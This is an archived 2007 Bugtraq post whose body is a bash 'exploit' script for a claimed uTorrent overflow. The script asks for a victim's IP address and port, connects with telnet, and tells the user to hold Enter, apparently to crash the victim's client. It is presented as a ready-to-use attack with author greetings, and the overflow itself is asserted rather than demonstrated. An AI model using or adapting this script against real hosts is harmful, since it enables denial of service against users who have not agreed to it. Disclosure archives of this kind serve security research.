lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: 2 Jun 2007 20:15:09 -0000
From: Dj.r4iDeN@...il.com
To: bugtraq@...urityfocus.com
Subject: uTorrent overflow

#!/bin/bash
#
# 				uTorrent overflow
# 				mail: dj.r4iden[at]gmail.com
# 		greet to : StrikerX , St0rM-MaN ,  MedoZero , hack_egy ,CPU
# you must kno the victim ip and the port he use in uTorrent 
#
clear
echo "Enter your victam IP?"
echo " "
read victamIP
victamIP=$victamIP
echo " Enter your victam port?"
echo " "
read victamport
victamport=$victamport
echo "after you connect hold the enter key"
echo -n "you wanna connect now?(y/n)"
read X
if [ "$X" = "y" ];then
telnet $victamIP $victamport
elif [ "$X" = "n" ];then
echo " good bye"
echo -n "exploit by dj.r4iden[at]gmail.com"
fi

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ